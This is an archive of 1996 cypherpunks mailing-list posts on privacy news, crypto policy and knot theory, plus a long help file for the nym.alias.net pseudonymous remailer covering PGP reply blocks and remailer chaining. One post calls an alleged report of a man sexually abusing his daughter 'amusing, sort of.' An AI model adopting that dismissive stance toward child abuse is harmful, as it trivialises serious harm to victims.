          L exis-Nexis, one of the nation's leading private
          information brokers, has discontinued a new online
          offering that provided access to
          millions of individuals' Social Security numbers, after an
          onslaught of complaints from customers and the credit
          information bureau that originally supplied the data. 

          The service, which was offered by the company for 10 days
          before it was discontinued Monday, was one feature of the
          new "Lexis-Nexis P-Trak Person Locator" that Lexis-Nexis had
          developed to attract new business from law firms and
          law-enforcement agencies. 

          [..]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 16 Jun 1996 17:43:34 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: WEB: Child molester database
Message-ID: <199606160421.AAA13020@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Jun 96 at 22:40, Damaged Justice wrote:

> Along with the arms trafficker page, now we have a "child molester
> database":
> 
> http://www.greatworld.com/public
> 
> Deadbeat Dads, Drug Dealers and more, coming soon according to blurb.

I took a look at the "Crooked Cops" page.  There was an anonymous 
note about this one copy from AL(abama?) who smoked grass while the 
contributer had sex with his daughter in the next room.

Amusing, sort of.

Rob.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Krister Walfridsson <cato@df.lth.se>
Date: Sun, 16 Jun 1996 11:03:35 +0800
To: cypherpunks@toad.com
Subject: Cryptology and knot theory?
In-Reply-To: <UlkgMQq00YUwQ3hq13@andrew.cmu.edu>
Message-ID: <Pine.VUL.3.91.960616003502.25074B-100000@marvin.df.lth.se>
MIME-Version: 1.0
Content-Type: text/plain


Hej!

I've finally got the time to read "Cyphernomicon", and in chapter 5 
(Cryptology) and 17 (The Future) I found this, which I think looks 
interesting, since I'm interested in computational topology.

    5.5.9. Miscellaneous Abstract Ideas
             [...stuff deleted...]
             - links to knot theory

    17.10.3. Ciphers are somewhat like knots...the right sequence of moves
             unties them, the wrong sequence only makes them more tangled. 
             ("Knot theory" is becoming a hot topic in math and physics
             (work of Vaughn Jones, string theory, etc.) and I suspect
             there are some links between knot theory and crypto.)
 
Has any work been done along those lines?

I did some searches with AltaVista, but I only found Cyphernomicon...

   /Krister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 16 Jun 1996 17:40:21 +0800
To: reagle@MIT.EDU>
Subject: Re: [Noise] Re: Clinton Backs Internet 'Decency Act'
In-Reply-To: <9606151900.AA24857@rpcp.mit.edu>
Message-ID: <ElktPEi00YUw8TyL0N@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 15-Jun-96 [Noise] Re: Clinton Backs I.. 
by Joseph M. R. Jr.@MIT.EDU 

Rich Graves wrote:
RG>This is also at odds with what Clinton said. The full text of the
RG>statement is available on whitehouse.gov, among other places.

>  
>         I don't see how necessarily. (1) He supports the bill, and (2) he
> thinks the bill is within the realm of constitutionality, his statement is
> rather weak, but I think if you take the two points above, their summation
> is obvious and _is_ contrary to the bravado of Gore's MIT commencement
> speech. This is not to say he could very well back off to save face, which
> is what he is starting to do, and I hope he continues to do... 

It is in fact not at odds with what Clinton said. In fact, Clinton did
not have to go out and defend the law's constitutionality in an official
statement.

He could have just said "my attorneys in the DoJ are reviewing the
opinion and will make a decision to appeal or not within the time given
by law."

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 16 Jun 1996 19:37:41 +0800
To: cypherpunks@toad.com
Subject: Re: alpha.c2.org in deep shit?
Message-ID: <199606160815.BAA01552@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> > Am I the only one who receives apparently empty messages
> > for my alpha.c2.org account?
> No. Since late Thursday.

What happened?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Staedeli" <scottst@ionet.net>
Date: Sun, 16 Jun 1996 18:06:17 +0800
To: cypherpunks@toad.com
Subject: Re: Attorney General wants to "expand crypto laws"
Message-ID: <199606160623.BAA05225@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain


   The Nando Time has a short story at:


http://www2.nando.net/newsroom/ntn/info/061596/info2_10501.html

   I have to give Janet some credit for persistance, after 
all the events of the last week, she's still pushing the 
four horsemen.


---
====================================================
Let's see, Dole, Clinton... Do I get another choice?
====================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 16 Jun 1996 18:09:34 +0800
To: WlkngOwl@unix.asb.com>
Subject: Re: More info on this?
In-Reply-To: <199606160412.AAA12830@unix.asb.com>
Message-ID: <MlkuLGu00YUwQTyElS@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I believe the folks at EPIC played a key part in this move by Lexis/Nexis.

-Declan


Excerpts from internet.cypherpunks: 16-Jun-96 More info on this? by
"Deranged Mutant"@unix.a 
>           L exis-Nexis, one of the nation's leading private
>           information brokers, has discontinued a new online
>           offering that provided access to
>           millions of individuals' Social Security numbers, after an
>           onslaught of complaints from customers and the credit
>           information bureau that originally supplied the data. 
>  
>           The service, which was offered by the company for 10 days
>           before it was discontinued Monday, was one feature of the
>           new "Lexis-Nexis P-Trak Person Locator" that Lexis-Nexis had
>           developed to attract new business from law firms and
>           law-enforcement agencies. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 16 Jun 1996 15:15:43 +0800
To: cypherpunks@toad.com
Subject: Non-Lethal Terrorism
Message-ID: <199606160233.CAA15426@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   For background on the recent cyber-terrorists reports from 
   London, we offer the Council on Foreign Relations' 1995 
   report: 
 
                      NON-LETHAL TECHNOLOGIES 
                 Military Options and Implications 
                Report of an Independent Task Force 
 
   The long history of military operations has been marked by 
   steady increases in the lethality of weapons. U.S. 
   commanders and policymakers face excruciating dilemmas in 
   decisions to use lethal force. They strive to maximize 
   protection of their own troops and to minimize collateral 
   casualties among noncombatants. Authoritarian regimes -- as 
   in Iraq -- and factions in civil wars -- as in Bosnia -- 
   may see fear of American casualties as one factor in 
   deterring intervention against them. Terrorists, guerillas, 
   and other irregular forces often exploit noncombatant 
   populations by mounting attacks from their midst. 
 
   Can technology, ease these dilemmas by providing 
   acceptable, effective non-lethal capabilities to supplement 
   conventional weapons across a broad spectrum of conflict? 
   In major wars or similiar cases of high-level violence, can 
   such capabilities reduce the risk to U.S. forces by, in 
   effect, substituting technology for manpower in performing 
   certain missions, for example, by shutting off power 
   transmission and communications of adversaries? In 
   situations short of traditional warfare -- for example, the 
   humanitarian intervention in Somalia -- can non-lethal 
   systems help provide calibrated coercion proportional to 
   the objectives? How do they relate to the lethal systems on 
   which U.S. forces depend? What policy issues do such 
   technologies pose? In this report a bipartisan task force, 
   including former Air Force and Army chiefs of staff, 
   leading scientists, and other experts, examines these 
   questions. The task force concludes that a number of 
   non-lethal technologies deserve serious consideration in 
   U.S. planning and development for future military 
   contingencies. 
 
 
   http://pwp.usa.pipeline.com/~jya/nltech.htm  (47 kb) 
 
   Beware snooping, consider using the anonymizer at: 
 
   http://www.anonymizer.com 
 
   ----- 
 
   Or, if http fails, NLT_ech to <jya@pipeline.com> 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 16 Jun 1996 18:35:42 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] (was Re: PBS show)
In-Reply-To: <960615224725_135852446@emout07.mail.aol.com>
Message-ID: <199606160653.CAA16337@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



AwakenToMe@aol.com writes:
> new lows??? Its a rather reasonable question about the protected mode on the
> intel chips considering the limits of 640K mem...Sorry if Im not as 'versed'
> in proteected mode as you,master, seem to be. Oh please teach us lesser ones.

Some people really just don't get it, do they.

Let the sewer flow...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sun, 16 Jun 1996 18:44:16 +0800
To: cypherpunks@toad.com
Subject: New nym server nym.alias.net
Message-ID: <199606160700.DAA08020@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have just set up a new 'nym server on nym.alias.net.  Options
include public-key encrypted replies, multiple and probabilistically
weighted reply-blocks, and fixed size response messages.

Right now the software should be considered in alpha test, so I can't
guarantee it won't crash or do bad things.  However, please feel free
to test it out and send me bug reports.

Send mail to help@nym.alias.net for more information.

- admin@nym.alias.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Krister Walfridsson <cato@df.lth.se>
Date: Sun, 16 Jun 1996 17:32:34 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Cryptology and knot theory?
In-Reply-To: <199606152350.TAA14182@jekyll.piermont.com>
Message-ID: <Pine.VUL.3.91.960616053537.28315A-100000@marvin.df.lth.se>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 15 Jun 1996, Perry E. Metzger wrote:
> I would have my doubts about how interesting the direction could get,
> since knot theory is a dead area. The classification problem was fully
> solved, and after that things got boring...

Well...  I think the theory has become much more interesting after 
the classification, because we know that our problem _can_ be solved,
and our only problem is to do it faster and to get a better understanding
for the subject (there are lots of conjectures which seems simple, but 
whose state is unknown.)
 
I agree that it doesn't look good (since most of our invariants are NP-hard)
but the vassiliev invariants might be used to approximate the other
invariants... (I do not know what has been done in such approximation
theory the last couple of years.)

   /Krister




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Mon, 17 Jun 1996 01:49:27 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606161420.HAA16666@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Depending on how you have your nyms set up, some of those apparently empty messages may be posting "receipts" from remailers. I have received similar and later the messages.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 17 Jun 1996 00:36:53 +0800
To: cypherpunks@toad.com
Subject: Re: Money Laundering
Message-ID: <v03006f01ade9b7222576@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


C'punks,

Earlier this week some people on a british financial services list I lurk
on talked about this book. I forwarded the reference to e$pam, and one of
my e$ list people hunted it down.

It's a book for british financial people on, heh, how not to be a
money-launderer...

Cheers,
Bob Hettinga

--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Ian Grigg <iang@systemics.com>
MIME-Version: 1.0
Precedence: Bulk
Date: Sun, 16 Jun 1996 12:06:44 +0200
From: Ian Grigg <iang@systemics.com>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Re: Money Laundering

I received the following information from the author
Nigel Morris-Cotterill <100520.2472@CompuServe.COM>:

-----------

The Book "How not to be a money launderer" is
ISBN 0 9527365 0 0.

Stockists incude Smiths (Ludgate Circus, Holborn
Circus, Liverpool Street), Hammicks (Chancery Lane),
Lambs (WC2), Dillons and Waterstones (quite a number
of shops around the country including Harrods),
Blackwells, HMSO Birmingham, Bloomsbury, Hong Kong
and a few smaller bookshops around the UK. Any bookshop
can order it. Bookshop price is L20. Some will charge
an ordering fee or a "notification " fee, others will
not. Or you can buy it direct from Silkscreen
Publications, P O Box 1882, Brentwood Essex CM15 0GA,
CWO, for L23 including postage and packing.

Regards

Nigel

--
iang
iang@systemics.com


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Help Message <nobody@nym.alias.net>
Date: Mon, 17 Jun 1996 02:57:39 +0800
To: cypherpunks@toad.com
Subject: Instructions for using nym.alias.net
In-Reply-To: <199606161444.KAA10366@anon.lcs.mit.edu>
Message-ID: <199606161445.KAA10373@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


WARNING:  This site is still in "alpha" state, and may have
          bugs. Please test it, but do not rely on it for truly
          sensitive pseudonyms until it has been tested for a while.
          Please report all bugs and problems to <admin@nym.alias.net>
          so that we can fix them.


* SETTING UP A MAIL ALIAS:

To set up an anonymous mail alias on nym.alias.net, you must first
generate a new PGP public/private key pair for use with your mail
alias.  Do this by running "pgp -kg".  You will be asked to choose a
user-id for your new key.  When you are prompted for the user-id, type
something not very descriptive that gives no indication of either your
real identity, the alias name you will choose, or even the
nym.alias.net machine.

Unlike your regular PGP key, you should make an effort to keep your
remailer public key relatively secret, and you should not use it for
any other purpose.  Do not sign it, and do not submit it to any key
servers or give it out to anyone.  To make sure you don't accidentally
sign other messages with your pseudonym's private key, you should
probably choose a new passphrase for your remailer key.  You may also
wish to put a line like:
  MYNAME = <your.real@e-mail.address>
in the file $HOME/.pgp/config.txt (which you can create if it
does not already exist).

Once you have a PGP key for your pseudonym, extract it to a file (for
instance with "pgp -fkxa 'key ID' > tmpfile".

Next, create a reply block for yourself.  First choose some
passphrases for conventional encryption.  Suppose you want your
message encrypted first with your public key, then with shared key
"passphrase_b", then with shared key "passphrase_a".  Create a
remailer message like this ("Latent-Time: +0:00" will prevent any
delay--use something longer for more security.)

 ::
 Request-Remailing-To: you@your.email.address
 Latent-Time: +0:00
 Encrypt-Key: passphrase_a

 **

PGP encrypt this with a remailer's public key (you can get remailer
information from fingering remailer-list@kiwi.cs.berkeley.edu, and you
can get the keys by running "finger pgpkeys@kiwi.cs.berkeley.edu | pgp
-fka").  This will yield a message like this:

 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
 /S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
 OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
 AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
 cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
 vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw==
 =Bla3
 -----END PGP MESSAGE-----

Prepend to this the following header:

 ::
 Encrypted: PGP

And finally add a command to send to the remailer you chose, yielding
a response block for one remailer:

 ::
 Anon-To: remailer@utopia.hacktic.nl
 Latent-Time: +0:00
 Encrypt-Key: passphrase_b

 ::
 Encrypted: PGP

 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
 /S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
 OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
 AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
 cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
 vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw==
 =Bla3
 -----END PGP MESSAGE-----

 **

For greater security, you should repeat this process so that mail to
your pseudonym travels through multiple remailers.  You can simply
encrypt the entire above message with another remailer's public key,
and insert the new cyphertext in a message similar to the example one
above.

Now, to set up a pseudonym on nym.alias.net, you need to mail four
things to config@nym.alias.net:  The pseudonym you wish to use, a
"create" command, your remailer public key, and the response block.
The reply-block must always come last in your mail message.  Thus, if
you wanted to choose the alias <test@nym.alias.net>, you would could a
message like this:

 Config:
 From: test@nym.alias.net
 Nym-Commands: create +acksend name="Full Name of Nym Test User"
 Public-Key:
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: 2.6.2
 
 mQCNAzGf6A8AAAEEAPknqWEUA8U4+l5TFkD5Fj0COten6bbIe5bBb/1MvI+w6mFl
 z06CPb2K/Z1fzjT48ZyxwYR+S3jU3Z96JEFRl99HYh3lTIUiBHW/XtwyefF0y61x
 qYkNuUpSFh9BDBFM7N3uVvaNbzLiFnqCpZLm5ZIfrLcla3qUgkTBtHVi58fRAAUR
 tDhsY3MgbWl4bWFzdGVyIGFkbWluaXN0cmF0b3IgPG1peC1hZG1pbkBhbm9uLmxj
 cy5taXQuZWRxPokAlQMFEDGf6ClEwbR1YufH0QEBX60D/jZ5MFRFIFA1VxTPD5Zj
 Xw2bvqJqFvlwLD5SSHCVfe/ka6ALuxZGFKD/pHpUAkfv1hWqAYsJpi0cf8HSdi23
 bh5dUeLJnHHHDmd9d55MuNYI6WTi+2YoaiJOZT3C70oOuzVXuELZ+nZwV20yxe8y
 4M3b0Xjt9kq2upbCNuHZmQP+
 =jIEc
 -----END PGP PUBLIC KEY BLOCK-----
 Reply-Block:
 ::
 Anon-To: remailer@utopia.hacktic.nl
 Latent-Time: +0:00
 Encrypt-Key: passphrase_b

 ::
 Encrypted: PGP

 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwC/nqSW1QDQfUBBACknZMV93wFS2CH0orlgslmEm+alhjI1eKwbbTTmeRWC5Rg
 /S3vZw+95ZuCZfqxKE0XrgZXzOEwfoyBcpVvf9Pb9D19TqEMTmmL/Jpl1xcxmbJ2
 OGsHpQ/TxpazBCVhdBmPblj5wWvwfG1+ZKpIkQ5hiLJhryQM/TUDarEscs3zdaYA
 AAB5231aMcQ74AKoDZizABMF3Tw+olV4mm4jVo9cMn2B3Rj2XBFl4pV9VL3h0ZQB
 cPY/ytBRyZPugr0NpLgjO+q6mEjCcgQrxpYQ+1PvFPdDx1GmJ5ogZqW+AVHsNqAp
 vRoiG8ZhXs4r3E8liFsNtMMf6CUAsdV2ZoX1Hw==
 =Bla3
 -----END PGP MESSAGE-----

Note that the first line of this message was "Config:".  ANY MESSAGE
SENT TO <config@nym.alias.net> WILL BE SILENTLY DISCARDED IF THE FIRST
LINE IS NOT "Config:"!

This message must then be encrypted with the nym.alias.net public key,
and signed by your new remailer public key.  The nym.alias.net public
key is listed here (pipe it to "pgp -fka" to add it to your public
key ring):

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzGzy5AAAAEH/2JjaB4AuQff90Mejru+FVptG4/wPmwK7WteavNXJpYxWoRm
SzxwNz70q4QCLKBR0QnzXqGeGtCB5IE4dIuPIkMiPvRv57rBaDe4qkzNkgwuZiH9
qGMsOSidCf+xaIJyL7RtljKuDSU8KH2OGIdwEpGa20U+9oXabWCpWwVvfJhgxPFF
xhiFLeMzhEUgsVXxIn2ThD8AyHyTUXWd11nvvTeKt+y9qX+7fUDrn6HIl1lFmxQA
RAOc83jjDNgWbanHWG9+1g8KFLkBrEdxJtNQeb/JMSZ122Dxda5CwtMnQGI0mCcr
dHNr1NA6WWaIfV0pR+sluNWFxNYuTk0OFgtg8c0ABRG0Kzxjb25maWdAbnltLmFs
aWFzLm5ldD4vPHNlbmRAbnltLmFsaWFzLm5ldD6JAJUDBRAxumL3RMG0dWLnx9EB
AaRTA/4xIgNrem7Yay0/rFfXgoGHUhWsZVhAlQP1fVEIRYuYEC4Biodwx3nYL31r
9IcgBkm/DUddkfCUfroMr7wbm6GnYnrVLc4dZ9ACCjUVX7n5hvanc8/Efx0yE03l
D+r9n5liz5X4vk65f+DIw1LykM9zTg/4GNwAENn6H5YTtg6Q+IkBFQMFEDG6YVlO
TQ4WC2DxzQEBIvMH/jER9tiQcJG2NvkiOqcIeBSPLb15EPFMg1He3clRIz398ToH
iv4oNKZEjVox3O0zowcUW0zfgtzhlMbudOwgoylCpCxVukuF1tsleoGlvDES0iA8
WdnYftt/rr3awf0j2pmLFbCmEDFaebuYgRXGe5yavaSjFDPzjFZqKwTYs5VnKOjP
XjI0yrem4PXw6K5sOANJKaa6yFrHJ/58iqbV8Rl7p0qNwwIi1nDn5UgpDOFDqWMq
sO9HUjRD2Y+Kmq6qlSg1gKV1hehZuAxHKtJAIZf+MPaI/sRbs79oN5GVwpmqoiZF
vz6bLS+qs69kVwg2RQoY2BSAzyUeT+rw70YfLAc=
=ekCY
-----END PGP PUBLIC KEY BLOCK-----

Create the message to nym.alias.net with the command:
   pgp -seat file config@nym.alias.net -u 'remailer key ID'.
Once you have produced a PGP encrypted and signed message, mail it to
<config@nym.alias.net> (preferably through some anonymous remailers
for maximum security).  If the name you chose is available, this will
create your mail alias.  You can send mail to <list@nym.alias.net> to
get a list of pseudonyms already in use.


* SENDING MAIL FROM YOUR PSEUDONYM

Once you have created a mail alias, you will automatically receive
mail sent to that alias (encrypted with the public key you mailed it).
To send mail from that alias, simply create a mail message, encrypt it
with the nym.alias.net public key, sign it with your remailer key, and
mail it to <send@nym.alias.net>.  Thus, for example, create a file
with (substituting the name you chose for "test"):

 From: test
 To: mail2news@anon.lcs.mit.edu
 Newsgroups: alt.test
 Subject: ignore this nym test

 just a test

If this file is called "testpost", and your remailer public key ID is
"xx testkey", run the command:
   pgp -seat testpost send@nym.alias.net -u 'xx testkey'
This will create a file called "testkey.asc", which you can then mail
to <send@nym.alias.net> to post the above test message to the
newsgroup alt.test.

Any mail you send through send@nym.alias.net will be PGP signed and
dated by the nym.alias.net private key to certify its authenticity.
If you do not wish your mail to be signed, or if your alias has its
own PGP key, you should simply send mail through ordinary remailers
(setting the From: address to be that of your nym) and shouldn't need
to go through send@nym.alias.net.


* CHANGING OR DELETING YOUR MAIL ALIAS

To change either your public, your response block, or the parameters
of your alias, you can simply send another message to
<config@nym.alias.net> as you did to set up the the alias initially
(only without the "Nym-Commands: create" command).  Once again, the
message will have to be both signed and encrypted with
   pgp -seat message -u 'xx testkey'
as described above for sending mail.

To delete your alias entirely, send encrypted and signed mail with
simply the lines:

 From: test
 Nym-Commands: delete

(substituting your real alias name for test).  After deleting your
alias, you should receive PGP-signed mail explicitly acknowledging the
deletion of that alias.  An acknowledgment simply confirming generic
"successful execution" of your request does not indicate that your
alias has been deleted.

There several commands you can give using the "Nym-Commands:" header
in a message to <config@nym.alias.net>.  You can place several on on
line, separated by spaces, or you can place multiple "Nym-Commands:"
headers in the same message.  Valid commands are:

+acksend/-acksend
  Enable/disable an automatical acknowledgment each time a message is
  successfully remailed for your alias through <send@nym.alias.net>.

+cryptrecv/-cryptrecv
  Enable/disable automatic encryption with your public key of messages
  received for your alias.  If public-key encryption is disabled, you
  absolutely must conventionally encrypt your messages if you wish to
  preserve your privacy (conventional is a good idea anyway--see the
  section on security).

+fixedsize/-fixedsize
  When you send the +fixedsize Nym-Command, all messages you receive
  will be padded to exactly the same size (roughly 10K).  This padding
  will take place outside the public key encryption, and so will only
  be useful if you also use shared-key encryption.  If you do used
  shared-key encryption, however, (and you really should), having all
  your messages be the same size will make it significantly harder for
  anyone to do traffic analisys on mail to your nym.

+disable/-disable
  One of the most effective forms of attack on a pseudonymous remailer
  such as this is to flood the system with messages for a particular
  destination.  Moreover, because this alias software does not know a
  message's final destination, it is possible that some joker could
  point an alias at itself (maybe even using two reply-blocks to
  create exponentially increasing levels of traffic).  To protect
  against this, if you receive more than 256 messages in one day, your
  alias will be disabled and further mail to you it will bounce.  You
  will receive mail notifying you of the situation if this happens to
  you.  At this point, you can re-enable your alias by sending a
  message with "Nym-Command: -disable" to <config@nym.alias.net>.

name="My \"Alias\" Name"
  To set up a name to be printed in all your outgoing messages, like
  this:
     From: My "Alias" Name <aliasname@nym.alias.net>
  You can set it with the name= Nym-Command.  Note the outer quotes
  are necessary even if your name does not contain any white space.
  Any quotes and backslashes in your name must be escaped with a
  backslash.

create
  This command must be given when creating a new alias.

delete
  This command deletes your alias and wipes your response block.  As
  described above, you should receive PGP-signed mail explicitly
  acknowledging the deletion of your alias.  An acknowledgment simply
  confirming generic "successful execution" of your request does not
  indicate that your alias has been deleted.


* REPLAY

The remailer keeps a replay cache, and will not accept the same
message twice unless each copy has been separately signed.  Thus, it
is safe to send multiple copies of outgoing E-mail messages through
very long remailer chains, if you are worried about one copy not
getting through.  Whether one or more copies actually make it through,
only one copy will go out.

One side effect of this is, however, that if you PGP sign a test
message and mail in the same message multiple times, it will only work
the first time.

Note that signatures are only considered valid for a week.  Thus, if
mail comes to send@nym.alias.net more than a week after you signed it,
that mail will be dropped.


* MULTIPLE REPLY BLOCKS

Sometimes anonymous remailers can be unreliable, and you would like to
receive two copies of all your messages through two independent
remailer chains.  Alternatively, perhaps you want to send one copy of
each E-mail message you receive to the bit bucket through a long
series of anonymous remailers.  You can assign multiple reply blocks
to your nym by prefixing each with "Reply-Block:" at the end of a
message to <config@nym.alias.net>.  For example, the following message
to <config@nym.alias.net>:

 Config:
 From: test
 Reply-Block:
 ::
 Anon-To: nobody@some.remailer.machine
 Latent-Time: +0:00
 
 Reply-Block:
 ::
 Anon-To: your.real@email.address
 Latent-Time: +1:00

Will setup your alias to send one copy of each message you receive to
"nobody@some.remailer.machine" immediately, and to send a second copy
to "you.real@email.address" after up to one hour of random delay.  Of
course, in order for this to be useful, you should use more complex
reply-blocks which chain through multiple remailers.

It may also make traffic analysis more difficult if you don't always
use the same remailer path.  You can assign a probability to a
remailer block by adding "p=probability" to the remailer block (where
'p' can be any single letter variable name).  For example, consider
the following reply-block:

 Reply-Block: p=0.5
 ::
 Anon-To: you@through.one.remailer
 Latent-Time: +1:00

 Reply-Block: p=0.5
 ::
 Anon-To: you@through.another.remailer
 Latent-Time: +1:00

 Reply-Block: q=0.75
 ::
 Anon-To: nobody@some.remailer.machine
 Latent-Time: +0:00

3/4 of the time, a copy of a message you receive will immediately be
mailed to nobody@some.remailer.machine.  After some random delay, your
message will be mailed to either "you@through.one.remailer" or to
"you@through.another.remailer".  Multiple reply-blocks with the same
probability variable are mutually exclusive.  Thus since the p blocks
are "p=0.5" and "p=0.5", and since 0.5 + 0.5 = 1.0, you are guaranteed
to get a copy of all your mail.  Generally speaking, you will probably
want all the weights associated with a particular variable to add up
to 1.0 unless the reply-block is just for cover traffic.  Bizarre
behavior may occur if your probabilities add up to more than one--this
is not recommended.

While the idea of using many different reply-blocks with small
probabilities may seem appealing for defeating traffic analysis, keep
in mind that each reply block is traceable back to you.  Suppose you
have 10 reply blocks for your 'nym, each with probability 0.1.  If
those reply blocks become compromised, only one of the 10 will have to
be uncovered to find out your real identity.


* SECURITY

If you care about the secrecy of your identity, then the only truly
secure way of of protecting it is by pointing all your response blocks
to usenet newsgroups.

The most important thing to realize about the privacy of your messages
is that anyone can determine your PGP public key ID from looking at an
encrypted message.  That means if you don't conventionally
super-encrypt mail, an observer on the network or at a remailer may be
able to determine which public key corresponds to which nym, and use
this to track messages.  If you redirect your mail to news group
alt.anonymous.messages, observers will be able to determine your
public key ID and observe how much mail you are getting.

For this reason, you should conventionally encrypt your mail in
addition to public-key encrypting it.  If you only want to use
conventional encryption for most mail, you can disable RSA encryption
by sending signed/encrypted mail with 'Nym-Commands: -cryptrecv' to
<config@nym.alias.net>.  There is a large benefit to using public-key
encryption.  If you only use conventional encryption and your
reply-block is compromised, then previously recorded messages sent to
you will be able to be decrypted.  With RSA-encrypted messages, there
is no way for anyone but you to read the message once it has left
nym.alias.net.


* POLICY

Any use of this alias service for illegal purposes is strictly
prohibited.

Do not rely on this nym server to protect your identity.  You should
be relying far more heavily on the integrity of the remailers through
which you chain your replies.  The nym.alias.net service is provided
in the hope that it will be useful, but the administrators can make NO
GUARANTEES WHATSOEVER that your identity will not be compromised.

That said, we will make a reasonable effort to keep the machine secure
and to ensure that your reply block never gets backed up to tape or
otherwise copied.  Note, however, that your PGP public key will get
backed up to tape, and so will likely be available for a while even
after you delete your Nym.  The server also keeps, not backed up, two
additional pieces of information on your nym:  First it counts the
number of messages your alias received in the current 24 hour period,
so as to detect flooding attacks and alias loops with exponential
message explosion (see the description of the -disable Nym-Command for
more info).  Second, the server stores the date of the last day on
which you sent a PGP-signed message to config@nym.alias.net or
send@nym.alias.net.  This is to help garbage-collect inactive accounts
with lost PGP keys at some later point should that become necessary.

Nym.alias.net is the same machine as anon.lcs.mit.edu.  Keep this in
mind when choosing which remailers to chain through.  (In other words,
using mix@anon.lcs.mit.edu as your last hop for mail to nym.alias.net
is probably a good idea if and only if you you also chain through one
more hop than you would otherwise have felt comfortable with.)


* E-MAIL ADDRESSES

<admin@nym.alias.net>
  The address to contact if you are having any problems with
  nym.alias.net.

<help@nym.alias.net>
  Sending mail to this address gets you a copy of this help file.

<remailer-key@nym.alias.net>
  Get the PGP public key for nym.alias.net.

<list@nym.alias.net>
  The address to contact for a list of all taken pseudonyms.

<config@nym.alias.net> 
  The address to which to send configuration messages.  All messages
  to this address must be PGP encrypted and signed with "pgp -seat".
  In addition, THE FIRST LINE OF PGP-SIGNED TEXT IN A MESSAGE TO
  config MUST BE "Config:".  Otherwise your message will be completely
  ignored.

  When sending one or more reply-blocks to <config@nym.alias.net>,
  they must come at the end of the message after any Public-Key: or
  Nym-Command headers.

<send@nym.alias.net>
  To send mail from your alias address, PGP encrypt and sign the
  message with "pgp -seat", and mail it to this address.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Mon, 17 Jun 1996 03:16:06 +0800
